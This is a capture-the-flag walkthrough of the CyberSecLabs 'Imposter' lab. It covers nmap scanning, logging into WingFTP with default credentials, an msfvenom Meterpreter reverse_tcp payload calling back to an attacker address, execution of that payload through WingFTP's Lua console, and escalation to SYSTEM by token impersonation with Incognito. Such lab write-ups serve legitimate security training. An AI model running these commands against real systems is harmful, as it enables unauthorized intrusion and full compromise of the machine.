csl-imposter-nl

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.
Today let’s play  CyberSecLabs Imposter  at  https://www.cyberseclabs.co.uk/labs/beginner-labs

Tasks

Scanning

nmap 172.31.1.20

 

nmap -A 172.31.1.20
We have several ports open, however the important ones to notice here are ports 21 and 8080.  21 is running FTP, and port 8080 is running WingFTP, which is a graphical FTP manager.

Enumeration & Exploitation

Enumeration begins with visiting the webpage, which we are able to actually log in to with the admin:password default credentials.  This quickly moves right in to exploitation
WingFTP login screen and Dashboard
Quickly poking around reveals that we are an administrative user, and are able to create an FTP user, which there currently aren’t any.

 

User Creation
We’ve created a user and granted them complete access to the file system.  This is where the unintended exploit was discovered.  WingFTP is running as a low privilege user, however by granting the access I did, I discovered that I was permitted to access the ENTIRE file system, to include the Administrator directory, System32 files, etc.  This is completely unintended, and after researching for some time I was unable to find anything in the wild that suggests this exploit has been discovered before.  I’ll be doing more research on this to determine if it’s simply a misconfiguration (which it shouldn’t be due to user permissions on the underlying machine), or an actual zero day exploit that’s not yet been discovered.
Now back to our regularly scheduled walkthrough.
We’ve now created our user, and can leverage it to gain access to the FTP service on the machine.  We’ll first need to log in to it, then create a payload with msfvenom, and can then utilize the Lua Console in WingFTP to execute it and gain a reverse shell in Metasploit.
 ftp 172.31.1.20 login

 

 User lian directory where we will place our exploit (notice we have RWX permissions on Administrator)

 

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.0.7 LPORT=5555 -f exe > pwn.exe

 

 put pwn.exe file upload

 

Metasploit Multi Handler and Payload parameters

 

Reverse shell via Lua Console execution – os.execute(‘cmd.exe /c C://Users/lian/pwn.exe’)
At this point we have Meterpreter shell access to the machine and are able to enumerate our current user.  We can do this using the win_privs module first to determine what our privileges are on the system.
run post/windows/gather/win_privs
Notice that we can Delegate and Impersonate privileges.  In order to do this, we can utilize the Incognito module in Meterpreter.
load incognito; list_tokens -u
We notice that the NT AUTHORITY\SYSTEM token can be delegated, which we will use the impersonate_token command for.
 impersonate_token “NT AUTHORITY\SYSTEM”
With the token impersonated, all you have to do is snag the flags and complete the challenge.
 User and Administrator Flags

.

 

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *